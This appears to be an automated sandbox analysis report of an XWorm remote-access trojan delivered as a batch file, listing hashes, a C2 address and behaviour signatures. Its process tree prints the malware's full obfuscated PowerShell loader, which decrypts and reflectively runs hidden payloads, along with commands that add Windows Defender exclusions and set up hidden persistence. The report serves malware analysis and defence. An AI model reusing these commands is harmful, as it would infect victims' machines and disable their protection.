Analysis

- Max time kernel: 149s
- Max time network: 150s
- Platform: windows10-2004_x64
- Resource: win10v2004-20240508-en
- Resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- Submitted: 31-05-2024 12:54

Tasks:
- Static task static1
- Behavioral task behavioral1: sample XClient.bat, resource win7-20240221-en
- Behavioral task behavioral2: sample XClient.bat, resource win10v2004-20240508-en
General

- Target: XClient.bat
- Size: 306KB
- MD5: 5f114fbb47589f072b2329adeab0e2d7
- SHA1: 1572da87baa2fcd945be9ca5073cf2c27a5e4eda
- SHA256: 976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
- SHA512: 4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
- SSDEEP: 6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX
Malware Config

Extracted family: xworm
- C2: 19.ip.gl.ply.gg:38173
- Install_directory: %Userprofile%
- install_file: Runtime Broker.exe
Signatures

- Detect Xworm Payload (1 IoC)
  Processes:
  - Resource behavioral2/memory/3600-49-0x0000025B485C0000-0x0000025B485DC000-memory.dmp matched YARA rule family_xworm

- Blocklisted process makes network request (1 IoC)
  Processes:
  - flow 26: powershell.exe (PID 3600)

- Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  Processes:
  - powershell.exe (PIDs 1704, 2240, 4876, 2740, 3280, 2144, 3600)

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes:
  - Key value queried by WScript.exe: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation

- Drops startup file (2 IoCs)
  Processes:
  - File created by powershell.exe: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk
  - File opened for modification by powershell.exe: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk

- Executes dropped EXE (1 IoC)
  Processes:
  - Runtime Broker.exe (PID 1500)

- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
  - Set value (str) by powershell.exe: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe"

- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  - flow 25: ip-api.com

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Modifies registry class (1 IoC)
  Processes:
  - Key created by powershell.exe: \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings

- Suspicious behavior: EnumeratesProcesses (19 IoCs)
  Processes:
  - powershell.exe: PID 3280 (x2), PID 2144 (x2), PID 3600 (x3), PID 4876 (x2), PID 2740 (x2), PID 1704 (x3), PID 2240 (x3)
  - Runtime Broker.exe: PID 1500 (x2)

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  - powershell.exe (PID 3280): Token: SeDebugPrivilege
  - powershell.exe (PID 2144): Token: SeDebugPrivilege, followed by three passes over the same privilege set: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the listing stops at 64 entries, so the third pass ends at 35)

- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
  - powershell.exe (PID 3600)

- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (each parent -> target pair is recorded twice):
  - cmd.exe (PID 1948) -> powershell.exe (PID 3280)
  - powershell.exe (PID 3280) -> powershell.exe (PID 2144)
  - powershell.exe (PID 3280) -> WScript.exe (PID 3916)
  - WScript.exe (PID 3916) -> cmd.exe (PID 2992)
  - cmd.exe (PID 2992) -> powershell.exe (PID 3600)
  - powershell.exe (PID 3600) -> powershell.exe (PID 4876)
  - powershell.exe (PID 3600) -> powershell.exe (PID 2740)
  - powershell.exe (PID 3600) -> powershell.exe (PID 1704)
  - powershell.exe (PID 3600) -> powershell.exe (PID 2240)
  - powershell.exe (PID 3600) -> schtasks.exe (PID 1056)

- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- [1] C:\Windows\system32\cmd.exe (PID 1948)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3280)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2144)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_719_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_719.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - [3] C:\Windows\System32\WScript.exe (PID 3916)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_719.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      - [4] C:\Windows\system32\cmd.exe (PID 2992)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_719.bat" "
        - Suspicious use of WriteProcessMemory

        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3600)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_719.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_719.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops startup file
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4876)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2740)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1704)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2240)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          - [6] C:\Windows\System32\schtasks.exe (PID 1056)
            Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
            - Creates scheduled task(s)

- [1] C:\Users\Admin\Runtime Broker.exe (PID 1500)
  Command line: "C:\Users\Admin\Runtime Broker.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Enterprise v15
Downloads